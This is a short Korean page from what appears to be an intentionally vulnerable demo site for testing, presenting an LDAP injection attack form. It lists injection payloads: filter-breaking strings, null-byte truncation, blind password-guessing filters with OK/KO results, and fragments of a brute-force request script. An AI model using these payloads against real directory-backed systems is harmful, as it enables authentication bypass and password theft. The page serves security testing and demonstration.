PoC
홈
웹 공격
API
로그인
PoC
홈
웹 공격
API
로그인
LDAP 인젝션 공격을 시작해 보세요.
공격 페이로드를 선택하고 실행하세요!
LDAP 인젝션 공격
user=john)(&)
user=my_name)(cn=))%00
key1=value)(key2=*))(&(attribute=value
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=MB*))
puts('[i] Looking for number #{i}')
alphabet = string.ascii_letters + string.digits + '_@{}-/()!\'$%=^[]:;'
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'})
userPassword:2.5.13.18:=\xx\xx\xx
(&(sn=administrator)(password=MYC*)) : KO
(&(sn=administrator)(password=MYK*)) : OK
공격 실행
경고:
본 웹사이트는 테스트 목적으로만 사용되는 의도적으로 취약하게 설계된 데모용 웹사이트입니다.
©
Monitorapp.
All Right Reserved